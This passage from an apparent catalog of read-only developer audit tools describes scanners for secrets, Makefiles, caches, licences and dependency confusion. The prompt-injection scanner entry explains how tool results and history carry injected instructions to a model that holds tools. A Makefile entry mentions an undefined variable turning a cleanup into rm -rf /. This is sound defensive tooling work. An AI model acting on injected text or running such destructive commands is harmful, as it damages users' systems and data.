one. A system prompt read at run time from a file or an environment variable that nothing in code review covers. Conversation history flattened into one string with no role separation, so a turn injected three messages ago persists for the rest of the session and reads exactly like operator text. And a tool RESULT fed back into the conversation, which is the loop every agent is: whatever the tool read - a database row, a fetched page, a file - goes back to a model that still holds its tools, so an attacker who can write what a tool reads is writing into the context on a turn where the model can act. Severity is blast radius: model output flowing into a shell, SQL, a file write or a network call is critical; untrusted text in a system prompt, or in any prompt on a call that declares tools, is high; untrusted text in a user-role message on a call with no tools and no privileged sink is medium and is often perfectly acceptable; a prompt built only from literals is not a finding at all and is never reported. Four correct patterns are recognised by name, counted, and excluded rather than reported: text placed in a clearly delimited block that ALSO carries an instruction to treat it as data, resolved through the named template constant it usually lives in; a value passed as a structured parameter rather than spliced into instruction text, excluded only while the call declares no tools and reaches no sink, because the same line is a finding the moment the model can act; a model call with no tools and no privileged sink; and a prompt assembled entirely from constants. A separate verify stage then re-opens every critical and high candidate at its exact file and line, re-reads the whole enclosing function and the constants it names - sharing no code with the analyzer, so a lexer bug cannot confirm itself - and returns CONFIRMED, WITHDRAWN or UNCERTAIN with a one-line reason quoting the text it read, which is what catches the guard or the data instruction that sits further from the line than a fast scan can look. Comments and string bodies are masked by a language-aware lexer, so a commented-out prompt stays a comment, while identifier-shaped literals survive masking because a dict key is structure rather than prose. Languages modelled: Python, JavaScript, TypeScript and Go. Read-only, offline, no network call, no credentials read, and it never executes the code it reads.ROTE3 STEPSREAD ONLY1 ↓588Package ShipReports what an npm package will actually publish, as against what its author believes it publishes. The gap between those two is where credentials and dead weight escape. Derives the tarball statically, the way npm does: the files allowlist if package.json has one, else .npmignore, else .gitignore, plus the always-included list (package.json, README, LICENSE, the main file) and the always-excluded list (.git, node_modules, .npmrc, lockfiles). Names the credentials that would ship and opens each one to confirm it holds a live value rather than a placeholder, the entry points in main, module, types, exports and bin that resolve to a path the tarball will not contain (a package that installs broken), the files patterns that match nothing, the total shipped size and the largest shipped files. Skips private packages, because a private package is never published and its contents are not a publishing risk. Never runs npm pack, which would need a network-capable npm, execute the package prepare scripts and write a tarball into the directory under audit. Offline, read-only, no registry call, no credentials.ROTE2 STEPSREAD ONLY1 ↓589Makefile AuditFinds the Makefile problems that make a build silently wrong rather than loudly broken, with make syntax actually parsed instead of grepped. Reports targets that are not .PHONY but produce no file of their own name, so `make test` turns into a no-op the moment a directory named test exists; targets declared .PHONY that no rule defines, so make prints Nothing to be done and exits 0; duplicate recipes where the later one silently wins; bash-only syntax in a recipe while SHELL is still /bin/sh; a cd on one recipe line that is thrown away before the next, because each line is its own shell; a shell variable read back empty across that same boundary; $(shell ...) in a := over a path this Makefile itself builds; undefined variables that expand to nothing, which is what turns rm -rf $(BUILD_DIR)/ into rm -rf /; prerequisites nothing defines; and sibling prerequisites that write the same path, so make -j races them. It knows where make's rules do not apply, so it does not invent findings: recipe lines start with a TAB and a space-indented line is not a recipe, backslashes join logical lines, ifeq/ifdef branches mean a target may be conditionally defined, pattern and static pattern and double-colon and suffix rules are not ordinary targets, .PHONY accumulates across every declaration, special targets are not build targets, a target that really does produce its own file is right not to be .PHONY, $@ and lt; and $^ are automatic variables, a variable the recipe guards with [ "$(TAG)" ] is a documented command-line parameter, .ONESHELL retires the per-line shell rules and .NOTPARALLEL retires the -j rule. Read-only, and it never runs make.ROTE2 STEPSREAD ONLY1 ↓590Env Example DriftReads the code, not your .env, so it answers what a fresh clone actually needs. This is not a .env-versus-.env.example diff: it never opens a real .env, and it works on a machine that has none, which is exactly the machine where a new contributor gets stuck. The question is which environment variables the SOURCE requires that its own .env.example never documents, and which documented ones are now dead. Scans every env read across JavaScript and TypeScript (process.env.X, process.env["X"], destructuring, import.meta.env, Deno.env.get), Python (os.environ[...], os.environ.get, os.getenv), Go (os.Getenv, os.LookupEnv), Rust (std::env::var, option_env!), Ruby (ENV[...], ENV.fetch) and PHP ($_ENV[...], getenv), at the real line of each match, and compares them with .env.example, .env.sample, .env.template, .env.dist and env.example. The distinction that matters is whether a fallback is supplied at the call site: process.env.PORT || 3000 is a documentation gap, os.environ["DATABASE_URL"] is a process that dies on line one, and the report ranks them that way rather than lumping every difference together. Reports the documented names nothing reads, separating truly dead entries from ones a compose file, CI workflow or chart still consumes, and closes with an explicit list of its own blind spots so a short findings list is not mistaken for a clean bill of health. Does not validate .env formatting and does not scan for leaked secret values; those are different jobs. A real .env is never opened, the committed example is read for KEY NAMES ONLY, and no source line is ever printed, so it is safe to run on a machine holding live credentials. Offline, read-only, no network.ROTE2 STEPSREAD ONLY1 ↓591Dependency ConfusionAnswers one question about a repository: which internal-looking dependencies could be hijacked by a public package of the same name. The bug is that an internal package name nobody claimed on the public registry can be registered by anyone, and the next install may pull theirs instead of yours. Four things are looked for: a dependency whose name looks internal (an npm scope this repository publishes under, a distribution prefix that matches how it names itself, a Go module on a host that is not a public forge, or a lockfile entry that does not resolve to the public registry); a private-registry configuration that does not pin the scope, meaning an .npmrc with a bare registry= line and no @scope:registry mapping, or a pip --extra-index-url, which ADDS an index rather than replacing one so pip queries both and installs the higher version; a lockfile entry for an internal-looking name that resolves from the public registry while the tree's own configuration expects a private source, meaning the public copy already won; and a go.mod requiring a module on a private host with no GOPRIVATE or GONOPROXY covering it. Findings rank by exploitability: an additive pip index beside an internal name is critical, an unpinned scope in an .npmrc is high, an internal name with no registry configuration at all is high, and a name that merely looks internal but resolves privately everywhere is informational. Telling a genuinely internal name from a public package that merely sounds internal is the hard part and the whole value, so it is answered structurally rather than by vocabulary: identity comes from what the repository publishes itself under, and a lockfile entry resolving from the public registry is treated as EXCULPATORY unless the tree also configured a private source for that name. Every critical and high candidate is then re-opened by a separate verify stage that walks the whole repository - for a workspace member declaring the name, for a scope mapping the per-manifest walk never reached, for a GOPRIVATE in a file the analyzer does not read - and emits CONFIRMED, WITHDRAWN or UNCERTAIN quoting what it read. Covers npm, yarn, pnpm, pip, poetry, uv, Pipenv, Go modules and Cargo. Read-only, offline, no network call, no credential ever copied.ROTE3 STEPSREAD ONLY1 ↓592Copyleft ReachAnswers the question an inventory cannot: does a copyleft obligation actually REACH the code you ship? Where license-guard inventories which licences are present in a dependency tree, this ranks each strong-copyleft (GPL, AGPL, SSPL) and weak-copyleft (LGPL, MPL, EPL, CDDL) dependency by whether what ships can actually reach it, so a GPL devDependency is never reported as a violation. Four kinds of evidence are gathered, strongest first: which manifest section declares it (npm `dependencies` versus `devDependencies` and `optionalDependencies`, pip `[project.optional-dependencies]` and requirements-dev files, Cargo `[dev-dependencies]` and `[build-dependencies]`, Go require lines); whether the shipped entry point transitively imports it, starting from `main`, `bin`, `module` and `exports`, from Next.js route and page files, from `[project.scripts]`, from `src/main.rs` and `src/lib.rs`, or from the Go `main` package, and following the import graph as far as static reading allows; whether the only importers are tests, build scripts or config; and whether its name appears inside a build output that is committed or in a `files` allowlist. Ranking follows the obligation, not the licence: strong copyleft reachable from a shipped entry point is critical, strong copyleft that only a dev section declares is informational and is never called a violation, weak copyleft reachable is medium with the note that the obligation attaches to the file rather than to the product, and an unresolved licence on a reachable dependency is its own high finding, because you cannot comply with a licence you cannot read. A dual-licensed package whose permissive branch can be taken is not a finding at all. Every critical and high candidate is then re-opened by a separate verify stage that re-reads the specific manifest line and the specific import establishing reach, re-derives the manifest section structurally and re-lexes the source file with full string and block-comment awareness, and emits CONFIRMED, WITHDRAWN or UNCERTAIN quoting what it read; withdrawn candidates are printed in their own section rather than silently dropped. Reads only what the package manager already put on disk. No registry call, no network, no credentials.ROTE3 STEPSREAD ONLY1 ↓593Cache Key ScopeAnswers one question about a codebase: where does it cache a value under a key that does not include everything the value varies by. A key that omits something the value depends on serves one caller's data to another, and it is invisible in testing because you need two different callers to see it. Five shapes are found and ranked by who can see what. Critical, because they cross a trust boundary: a cache write whose value derives from a user, tenant, account, org or session identifier where that identifier is absent from the key; and a response marked Cache-Control public or s-maxage, or a Django cache_page, from a handler that reads an Authorization header, a cookie or a user parameter, with no Vary on it, which leaks through a shared cache rather than in-process. High: a key built from a subset of the parameters that actually influence the value, and a memoisation decorator - lru_cache, cache, cached, memoize, unstable_cache, Cacheable, or a module-level dict - on a function whose result depends on request state, a module global or mutable self state rather than only on its arguments. Medium: a key that omits a locale, currency, timezone, feature flag or A/B variant, which is wrong output rather than somebody else's data. Telling "the value depends on the caller" apart from "the function merely takes a user argument it does not use in the result" is the hard part and the whole value, so dependence is established by a def-use walk from the value expression back through the assignments of the enclosing function, every hop is printed as evidence, and a hit with no strong evidence goes to its own low-confidence bucket. Seven correct patterns are recognised, counted and never reported: a value that genuinely does not vary by caller, a key that already carries the identifier through a variable or a namespace, a per-user or per-tenant cache instance, a request-scoped cache that cannot outlive the request, a memoised pure function, a shared-cacheable response that does carry Vary, and a cache primitive whose key is an opaque parameter its callers composed. A narrow key whose omitted dimension is re-checked on every hit is demoted and told to say so. Comments and string bodies are separated by a language-aware lexer, so a commented-out cache write stays a comment and the word user inside a key literal never counts as the identity being present. JavaScript, TypeScript, Python, Go, Ruby, Java and Kotlin. Read-only, offline, no credentials.ROTE2 STEPSREAD ONLY1 ↓594Monorepo Workspace MapMap a monorepo's package boundaries — which workspace packages exist, which depend on which, which are leaves nobody imports, and which dependency cycles exist. Also reports version skew, where the same external dependency is pinned differently in different packages, which is the papercut that builds fine and then breaks once at runtime. Understands npm and yarn workspaces, pnpm workspaces, Cargo workspaces, go.work, uv workspaces, and lerna. If the repository is not a monorepo it says so and lists every workspace definition it looked for, rather than returning an empty map. Read-only, no credentials, no adapters. A local path is inspected in place, a URL is shallow-cloned to a temp directory, and nothing the repository ships is ever executed.ROTE2 STEPSREAD ONLY1 ↓595Repo Onboarding BriefOnboard to an unfamiliar repository, and check its setup instructions instead of trusting them. Cross-references every command the README tells you to run against what the project actually defines — package.json scripts, Make targets, justfile recipes — and against the tools present on your machine, so a documented-but-nonexistent command is named before you lose an afternoon to it. Also reports stack and version floors, entry points, a layout map, risk flags (no lockfile, no tests, no CI, committed secret-shaped files), and an explicit list of what it could not determine. Read-only, no credentials, no adapters. A local path is inspected in place, a URL is shallow-cloned to a temp directory, and nothing the repository ships is ever executed.ROTE3 STEPSREAD ONLY1 ↓596Pr Risk DigestScans ALL open GitHub PRs and produces a risk digest table: staleness, CI status, review state, size, and test-file coverage, flagging HIGH RISK PRs. Candidate set = every stale PR (exhaustive) plus a bounded recent-activity sample.APISESSIONSGITHUB0 STEPSREAD ONLY1 ↓597Shipped Page AuditAnswers one question about a page you have already deployed: what does it hand a visitor that it should not? Source code tells you what was written; only a real page load tells you what shipped, and the two differ for a dozen ordinary reasons - a build flag, a CDN, an edge rule, a header set on a proxy nobody reads. A real browser loads the URL, and the audit then reads what a visitor actually receives. Six things: the security response headers that are genuinely present, reporting what is missing AND what is present but permissive, because a Content-Security-Policy carrying unsafe-inline, unsafe-eval or a wildcard source reads as protection in a review and is not; the cookies set on the response, flagged for a missing Secure, a session-shaped name with no HttpOnly, SameSite=None, or a Domain widened to the whole registrable domain, with the cookie value never read and never printed; source maps reachable from production, which is the finding that matters most, because a sourceMappingURL whose target answers 200 hands over the original unminified source of that bundle, and this is the live counterpart to a build-output check that can only tell you what your own dist directory contains; mixed content, meaning any http:// subresource on an https:// page; credential-shaped literals in what the browser received, in an inline script or a fetched bundle, reported as a file, a shape and a count and NEVER as a value, not even truncated; and the third-party origins the page contacts, listed plainly, because each one is a party that sees your visitors. Grading follows what a visitor or an attacker actually gains: a resolvable source map or a server-only credential shape in a bundle is critical, a missing HSTS or a permissive CSP is high, a missing X-Content-Type-Options is medium, and a third-party origin is context rather than a finding. The browser is load-bearing rather than decorative: it resolves the URL a visitor really lands on, including a JavaScript or meta-refresh redirect no fetch follows, so the audit reads the page that shipped instead of the URL you typed, and it reports a redirect that crossed to a different registrable domain instead of silently auditing somebody else. Read-only, and strictly so: one page load, GET requests only, no crawling, no form ever submitted, nothing clicked, no login, no cookie banner accepted, no cookie sent back and no credential of any kind transmitted. If the page does not load, times out, or answers anything but 2xx, the report is UNKNOWN and no verdict is given, because a clean report over a page that never loaded is the worst output this could produce.BROWSERSHELL7 STEPSREAD ONLY1 ↓598Pypi Outdated CheckerGiven a path to a Python requirements.txt file, checks PyPI for each pinned package and lists which ones are outdated, showing current vs latest version.ROTE1 STEPSREAD ONLY1 ↓599ChronosChronos: Intelligent Task Scheduler & Time-Blocking Planner. Slots high-priority work into uninterrupted focus blocks, enforces realistic daily capacity limits, generates an explicit 'What NOT to Do' list, supports optional Google Calendar sync, and features zero-markdown terminal tree rendering.ROTE1 STEPSREAD ONLY1 ↓600Regression ProofProves a reproducible Git regression in an isolated clone and worktree, with optional read-only GitHub provenance enrichment.APISESSIONSGITHUB6 STEPSREAD ONLY1 ↓601Sec Filing Timeline BriefGiven a US public company's stock ticker, looks up its most recent SEC EDGAR filings (8-K, 10-K, 10-Q and amendments) via SEC's free public data API and produces a cited filing timeline with dates, item codes, and direct sec.gov document links. Read-only, no credentials; reports filing metadata only, never an investment or risk judgment.ROTE2 STEPSREAD ONLY1 ↓602Blast RadiusAnalyze a GitHub pull request and identify its potential blast radius from evidence in the repository.APISESSIONSGITHUB2 STEPSREAD ONLY1 ↓603Agent ReadyAI agent readiness scorer. Checks a website for agent-discovery standards (ARD capability manifest, RFC 9727 API catalog, OAuth discovery, MCP server card, A2A agent card, agent-skills index, robots.txt, sitemap). Returns a readiness score 0-5 with pass/fail/neutral for each check and concrete fixes. Read-only, no credentials, one external call per check. ROTE3 STEPSREAD ONLY1 ↓604Oncall Outage CopilotWhen an outage hits, this Play fetches the latest Sentry/PagerDuty alerts, matches them with the last 5 GitHub PRs, and asks an LLM to find the culprit.ROTE0 STEPSREAD ONLY1 ↓605Revenue Leak DetectorAudits a website for performance issues, calculates revenue loss, generates an AI fix strategy, and sends a dashboard to Slack/Telegram.ROTE0 STEPSREAD ONLY1 ↓606DeppulseROTE5 STEPSREAD ONLY1 ↓607Check Failing WorkflowsROTE1 STEPSREAD ONLY1 ↓608JobwatchDaily job-search briefing from RemoteOK and WWRROTE3 STEPSREAD ONLY1 ↓609Change Impact MapRead-only change impact analysis for a proposed code change. Given a repository path, target symbol, and change description, locates definitions, direct and indirect references, imports, tests, git history, and config touchpoints; separates real dependencies from coincidental text matches; and returns a risk-ranked impact map with verification steps. Never modifies, commits, or pushes files.ROTE7 STEPSREAD ONLY1 ↓610Meeting To ActionROTE1 STEPSREAD ONLY1 ↓611Fact Check Ai ClaimsFact-check claims made by your AI against real public websites. Compares dates, prices, rules, and facts from 2 to 8 web pages and clearly flags when sources agree or contradict each other. Zero setup, zero API keys, 100% read-only.ROTE2 STEPSREAD ONLY1 ↓612Meeting Action TrackerConvert text into a concise action and decision report.ROTE2 STEPSREAD ONLY1 ↓613Rl Signal DetectionDetect PPO/GRPO policy collapse, exploration death, and reward crashes with deterministic threshold citations.ROTE1 STEPSREAD ONLY1 ↓614Why Did This BreakBounded-transition metadata forensics for finding time-aligned changes between a last-known-good and first-observed-broken state.ROTE1 STEPSREAD ONLY1 ↓615Ml Repository Due DiligenceInvestigate a public ML/AI GitHub repository and produce an evidence-backed use, reproduction, and research-value verdict.APISESSIONSGITHUB6 STEPSREAD ONLY1 ↓616Mindcraft 3d Game ForgeRegenerates the current MindCraft 3D game from its design and runs the self-healing browser playtest.ROTE2 STEPSREAD ONLY1 ↓617Api Retry BackoffRetry API calls with exponential backoff on 429/5xx, give up after 5 attempts, log each retryROTE1 STEPSREAD ONLY1 ↓618Llm Cost TrackerTrack LLM token usage across sessions, calculate costs per provider, alert on budget threshold, log cost spikesROTE1 STEPSREAD ONLY1 ↓619Spark Fleet HealthChecks a local LLM dev backend's fleet readiness: whether claude-code-router is running, whether the model host is reachable via Ollama or llama-server, which models are loaded, and a combined READY/NOT READY verdict. Read-only, no credentials, no adapters.ROTE3 STEPSREAD ONLY1 ↓620Telegram PosterPost content to Telegram with text, optional media, and optional schedulingROTE1 STEPSREAD ONLY1 ↓621Llm Provider HealthMonitor LLM provider health, trip circuit breaker on 429/5xx, switch to fallback, log healing actionROTE1 STEPSREAD ONLY1 ↓622Job Resume MatchAnalyze a public job posting against a local resume and produce an evidence-backed application analysis.ROTE4 STEPSREAD ONLY1 ↓623List Google SheetsLists Google Sheets spreadsheets in your Google account with title, ID, modified time, and web URL.APISESSIONSDRIVE-API-V32 STEPSREAD ONLY1 ↓624Last Commit SummaryReturn the last commit SHA, author, date, and message for a GitHub repositoryROTE2 STEPSREAD ONLY1 ↓625Github My Issues PriorityList open GitHub issues assigned to a user in a repo and rank them by priority/effort matrix (high priority, low effort first)APISESSIONSGITHUB2 STEPSREAD ONLY1 ↓626Axiom Pippin Error InvestigatorInvestigates a Pippin Discord error ID in Axiom, resolves its trace, and reports Discord API failures and the likely failed source message.SESSIONS0 STEPSREAD ONLY1 ↓627Github Actions Workflow DispatchDispatch a GitHub Actions workflow_dispatch run with optional inputs and return the run URLSESSIONS0 STEPSREAD ONLY1 ↓628Github Create Pull RequestCreate a GitHub pull request from a pushed branch.SESSIONS0 STEPSREAD ONLY1 ↓629Synaptic PrunerTransform chaotic terminal logs into clean, declarative infrastructure plays. A six-stage pipeline that ingests raw terminal output, prunes noise via causal DAG analysis, and synthesizes reproducible Rote Plays using Gemini LLM.SESSIONS0 STEPSREAD ONLY0 ↓630Pdf To Exam Study GuideTurns a college unit PDF into a validated, source-traceable exam study guide with notes, flashcards, practice questions, and an exam plan.ROTE10 STEPSREAD ONLY0 ↓631Setup Express ProjectCreate a data directory, install Express with npm, and initialize an index.js file.SESSIONS0 STEPSREAD ONLY0 ↓632Json SweepOne malformed JSON file breaks the build nobody watches. Sweeps worktree JSON files for syntax errors with exact line and column. Skips counted, never silent. Zero keys, python3 stdlib only.ROTE1 STEPSREAD ONLY0 ↓633Rate Limit LedgerWhere did the session hit the rate wall? Tallies throttle incidents in session evidence with waits quoted from evidence, never extrapolated. Session-evidence check with zero keys; needs only python3.ROTE1 STEPSREAD ONLY0 ↓634Error Spiral TrapCatch the error spiral before it eats the session budget. Finds runs where the same tool fails on the same target 3+ times and reports the longest spiral. Session-evidence check with zero keys; needs only python3.ROTE1 STEPSREAD ONLY0 ↓635ModiqoScan a project folder, detect languages, install compilers, configure ZedROTE5 STEPSREAD ONLY0 ↓636Unused Import ScanEvery unused import is tokens paid on every read. Pre-commit scan of Python files with stdlib ast: per-file per-line unused imports, respecting re-exports, __all__, and noqa. Zero keys, python3 stdlib only.ROTE1 STEPSREAD ONLY0 ↓637Buried InstructionsAre your agent's orders buried where it stops reading? Every imperative rule gets a token offset; rules past the threshold are BURIED with move-up guidance. Research-grounded prompt hygiene with zero keys; needs only python3.ROTE1 STEPSREAD ONLY0 ↓638Changelog Tag GuardDoes the CHANGELOG describe what the tags shipped? Cross-checks git tags against CHANGELOG entries before release; untracked tags are DRIFT, missing evidence INDETERMINATE. Release-gate habit, read-only, zero keys; needs only python3 and git.ROTE1 STEPSREAD ONLY0 ↓639Env Drift RadarEnvironment configuration auditor and .env.example synchronization radar. Compares active .env files against .env.example templates and codebase variable references (process.env, os.environ). Identifies missing production keys, detects accidental secret leaks in example files, and generates a clean, synchronized .env.example.ROTE5 STEPSREAD ONLY0 ↓640Port Conflict LiberatorLocalhost port conflict diagnoser and instant process liberator. Resolves 'Error listen EADDRINUSE' by scanning commonly collided dev ports (3000, 3001, 5173, 8000, 8080, 5432, 6379, 27017) or a custom target. Identifies the PID, process name, memory footprint, and provides graceful one-liner liberation commands.ROTE4 STEPSREAD ONLY0 ↓641Dep Drift ScoutUniversal dependency health, vulnerability, and drift scanner. Inspects Node (package.json), Python (requirements.txt / pyproject.toml), Rust (Cargo.toml), and Go (go.mod). Queries public advisory feeds for known CVEs, scores dependency health from A to F, and emits actionable upgrade commands.ROTE5 STEPSREAD ONLY0 ↓642Docker Hygiene ReaperLocal Docker storage auditor and safe cleanup doctor. Analyzes dead containers, dangling image layers, anonymous orphan volumes, build cache bloat, and conflicting port bindings. Computes reclaimable disk gigabytes and generates safe, non-destructive prune commands to protect production databases.ROTE5 STEPSREAD ONLY0 ↓643Editor Style GuardNoisy diffs are a daily tax: trailing whitespace, missing final newlines, mixed tabs-and-spaces, CRLF endings. Scans the worktree read-only with no git needed and lists offending lines. Zero keys, python3 stdlib only.ROTE1 STEPSREAD ONLY0 ↓644Commit Message LintDo your commit messages follow the convention your tooling expects? Grades recent git history against Conventional Commits shape and records breaking markers. Every-push habit, read-only, zero keys; needs only python3 and git.ROTE1 STEPSREAD ONLY0 ↓645Pr Preflight RadarPre-flight sanity & readiness radar for Git branches and Pull Requests. Discovers changed files against the base branch, scans diffs for leaked secrets, detects leftover debuggers, console logs, merge conflict markers, test isolation skips, and lingering TODOs, computes change complexity metrics, and synthesizes a formatted, ready-to-paste PR description.ROTE5 STEPSREAD ONLY0 ↓646ScoutStress-tests a published Play's contract before you trust it. Reads the Play's disclosed manifest — parameters, steps, credentials, write permissions, host requirements — and reports the real inputs it needs, what it touches, where it would break on a stranger's fresh input, and a one-line safe/check-first/avoid verdict. Scoped to whether the Play defends itself and how to run it safely; never probes for exploits, never installs or executes the inspected Play.ROTE1 STEPSREAD ONLY0 ↓647Ics Meeting CostAudits an exported calendar file for meeting load and fragmentation: total hours, days without a focus block, worst back-to-back run, overlaps flagged. Weekly Friday habit with zero adapters; needs only python3.ROTE1 STEPSREAD ONLY0 ↓648Rss Morning BriefReads your public RSS/Atom feeds and prints this morning's brief: fresh items newest-first with per-feed counts. Failed feeds stay DEGRADED, undated items UNKNOWN. Daily 09:00 habit with zero API keys; needs only python3.ROTE2 STEPSREAD ONLY0 ↓649Session LedgerEvery agent harness on this machine keeps a transcript, each in its own shape, and none of them agree on what a token record looks like. Claude Code writes one line per content block so four in ten usage lines are duplicates of the same API call, and buries subagent spend in a subdirectory. Codex writes cumulative counters that have to be differenced. Pi and OpenCode have their own layouts. This reads all of them and emits one deduplicated ledger: usage records with uncached input, cache write, cache read, output and reasoning tokens per model per turn; the human messages that started each turn; and every tool call with whether it errored. Nothing is priced, nothing is judged, and message text is truncated and hashed unless you ask for it. It is the file the other session Plays should be reading instead of each re-parsing the logs, and it says which sources it found, which it could not read, and why. Read-only, no credentials, no network. Writes one JSONL and one summary JSON under the folder you choose. Point it at resources/fixtures to see a full run on synthetic logs first. - Reads: session logs under the four configured directories. Nothing else. - Never reads: `~/.claude.json`, `~/.codex/auth.json`, any credential, keychain or token file. Which AI you run is inferred from the model ids already in those logs; the plan tier is never read from your account. - Never sends: no network calls of any kind. Verifiable: the core imports no `urllib`, `http`, `socket`, `subprocess` (except the PNG renderer, which is invoked with a fixed argv and no shell). - Writes: only under `out_dir`. Every written path is listed in the report. - Message text: truncated to 120 chars and hashed by default. `redact=false` keeps full text locally, never in the card. See also: `comped` (prices this ledger and finds your repeat asks) and `wrong-turns` (recurring mistakes, with drafted rules). Docs, the full methodology and a worked example: https://gotcomped.comROTE6 STEPSREAD ONLY0 ↓650Session GateOne gate after every agent session: four parallel probes (rule files, workspace dirt, documented commands, transcript growth) join into a single SESSION-CLEAN or REVIEW-QUEUE verdict. Read-only umbrella over session hygiene with zero API keys; needs only python3 and git.ROTE5 STEPSREAD ONLY0 ↓651Replay MicroscopeRun the same prompt twice, diff the paths. Finds repeats of one prompt inside local agent transcripts and reports CONSISTENT, PARAPHRASE, or DIVERGENT with a consistency fraction, so flaky prompts get pinned instead of rerun blind. Zero API keys; needs only python3.ROTE1 STEPSREAD ONLY0 ↓652Instruction WatchReceipts for who edited the agent's own rules. Hashes AGENTS.md, SKILL.md, and hooks before an agent session and diffs them after, naming any mid-run self-modification for human review. Run as a session gate with zero API keys; needs only python3 and git.ROTE1 STEPSREAD ONLY0 ↓653Team Task SplitterTeam Task Splitter converts a feature list and teammate skills into owned workstreams with explicit prerequisites, contract checkpoints, integration order, waiting risks, and a handoff-ready definition of done. It optimizes for parallel progress without pretending that commit counts measure contribution or that an unverified task is complete. Use it before implementation and again when dependencies change. Read-only planning: no repositories, services, credentials, or external state are accessed.ROTE9 STEPSREAD ONLY0 ↓654Feature To TasksBreak one feature into ordered implementation tasks, prerequisites, and completion criteria.ROTE9 STEPSREAD ONLY0 ↓655Package Install HellExtract dependency conflict chains from installer output and rank least-destructive resolution paths. Read-only: no code execution, network calls, writes, credentials, or secret values.ROTE8 STEPSREAD ONLY0 ↓656Mvp Path FinderMVP Path Finder is a time-boxed rescue brief for a project with many partial features but no reliable end-to-end journey. It turns supplied progress and a target journey into a smallest demonstrable path, explicit blockers, deferred work, acceptance evidence, and a freeze rule. It does not inspect or execute a repository; statements are planning hypotheses that the team must verify. Read-only: no files, services, credentials, or external state are accessed.ROTE8 STEPSREAD ONLY0 ↓657It Runs But Nothing HappensTrace expected behavior through entry points, conditions, callbacks, state, and output to locate where evidence disappears. Read-only: no code execution, network calls, writes, credentials, or secret values.ROTE8 STEPSREAD ONLY0 ↓658Integration Order PlannerPlan a safe integration sequence for frontend, backend, models, and services with checkpoints.ROTE8 STEPSREAD ONLY0 ↓659Idea To Tech StackRecommend the smallest practical technology stack for a project idea, team skills, and time limit.ROTE8 STEPSREAD ONLY0 ↓660Engineering Work TriageConsolidates sanitized QA, PR, deadline, unfinished-work, and CI signals into prioritized engineering workstreams.ROTE1 STEPSREAD ONLY0 ↓661Automation FinderMines your own Claude Code chat history -- one project or every project at once -- looking for patterns that are BOTH genuinely repeated AND mechanical enough to automate, not just repeated. It is told explicitly to reject pure judgment work (design/aesthetic calls, "does this look right", deciding what content to keep) even if that repeats constantly, and to only propose something when it can quote real evidence: which project(s), roughly how many times, and a verbatim quote from your own chats. For each real candidate it hands you the exact `rote play template create ...` command to start building it, and cross-checks the real play.modiqo.ai registry so it does not send you to rebuild something that already exists. With apply_global=true it saves the findings into a global skill (~/.claude/skills/automation-finder-candidates) so a future Claude session already knows what is worth automating next -- additive only, skips cleanly if it already ran today. Default apply_global=false only prints the findings. Leave root empty to scan every project on this machine; pass root=<path> to scope it to just one project.ROTE5 STEPSREAD ONLY0 ↓662Claude Memory SyncNever re-explain your project to Claude again. Reads through your Claude Code chat history and writes down what's worth remembering, split into two places: notes specific to one project (appended to that project's own CLAUDE.md), and general know-how you taught it in depth on some topic -- research, how something actually works -- saved as a reusable skill any future chat, on any project, can pull up with /skill-name. Run it with no arguments and it sweeps every project you've ever chatted about on this machine; point it at one folder (root=./my-app) to scope it to just that project. It only writes when you tell it to: apply=true writes the project notes, apply_global=true writes the global skills -- by default (both false) it just shows you a preview and writes nothing. Run it again later and it only looks at chat since the last time, and never repeats what is already written down. Examples: `rote play run claude-memory-sync` previews everything for every project without writing anything; `rote play run claude-memory-sync apply=true apply_global=true` actually writes it all; `rote play run claude-memory-sync root=./my-app apply=true` does just one project's notes. Optional: pass a Supermemory API key (supermemory_key=...) to also back a copy of each project's notes up to supermemory.ai, so the memory survives even if you lose this machine or this AI account.ROTE1 STEPSREAD ONLY0 ↓663Readme ContractREADME contract referee. Checks README files against the repository evidence: documented commands, local links, code block formatting, package scripts, version claims, and prerequisite sections. Returns a deterministic verdict (HEALTHY / NEEDS_WORK / INCOMPLETE) with prioritized recommendations. Read-only, no credentials. ROTE6 STEPSREAD ONLY0 ↓664Onboard DoctorIs this machine ready for the Rote Playoffs? Checks OS/WSL, binaries, versions, Rote login, harness CLIs with matching play syntax, and registry reachability, then gives an ordered fix queue. Read-only Rote-setup check with zero API keys; needs only python3.ROTE1 STEPSREAD ONLY0 ↓665Pipeline HandoffA multi-stage pipeline passes state between stages and NOTHING type-checks that handoff. Stage 2 reads a field stage 1 never writes, and on the day the input shape changes it fails silently or processes nothing. This reconciles the data contract BETWEEN stages: for every pipeline under a root, what each stage WRITES against what the next stage READS. Two sources, chosen because in both the stage graph and the values crossing it are written down and statically readable. GitHub Actions: `needs:` is the graph, `needs.<job>.outputs.x` and `steps.<id>.outputs.x` are the reads, a job's `outputs:` map and `>> $GITHUB_OUTPUT` are the writes, upload/download-artifact is a file handoff with a name on both ends, and `${{ env.X }}` is a read of something the pipeline has to have defined. n8n workflow JSON: `connections` is the graph, `{{ $json.field }}` and `{{ $('Node').item.json.field }}` are the reads, and a Code node's returned object literal is the write. A stage's boundary also extends into the shell script it invokes, so a script that writes one intermediate path while the next stage's script reads another is the same failure one layer down. Ranked by cost: a consumer reading a field, output or artifact NO producer in the pipeline writes is critical, because it has never worked or has silently stopped; a name mismatch between upload and download, a needs context that does not carry the job it reads, and a required env defined nowhere readable are high; a producer writing what nothing consumes is medium, usually the surviving half of a rename; and a stage whose failure cannot stop the pipeline is medium, because a broken handoff then looks exactly like success. A fourth stage re-opens the exact producer and consumer LINES behind every critical and high candidate and returns CONFIRMED, WITHDRAWN or UNCERTAIN quoting both - the withdrawals matter as much as the confirmations, since a field produced two stages upstream, an output written inside a brace group, and a step this play's own YAML reader could not see all look identical to a broken handoff until something re-reads them. Honest about being static analysis of dynamic expression languages: the forms it resolves and the forms it cannot are both listed, and every unresolvable one - a computed field key, a node named by an expression, a Code node returning a variable, a third-party action whose outputs live in another repository, an artifact name built from something other than a matrix - is EXCLUDED and COUNTED with its reason, never guessed and never quietly dropped. Not schema-drift, which reconciles an ORM model against migration history; not env-example-drift, which reconciles application env reads against .env.example; this reconciles one pipeline stage against the next. EXECUTES NOTHING: no workflow, stage, make target or container is ever run, n8n is never started, no Action is ever triggered, and no binary is probed - not even with --help, since a CLI dispatching on its first positional argument takes --help positionally. n8n exports and CI files hold credentials, so every value is reduced to a NAME and a shape before anything enters the report, by construction rather than by scrubbing, and comments are redacted on the same path as code. Offline, read-only, no network, no credentials. Needs python3 and bash.ROTE3 STEPSREAD ONLY0 ↓666Guard EffectivenessPeople install hooks and permission rules to stop an agent doing something, and then nobody checks whether the guard actually stops it, or what 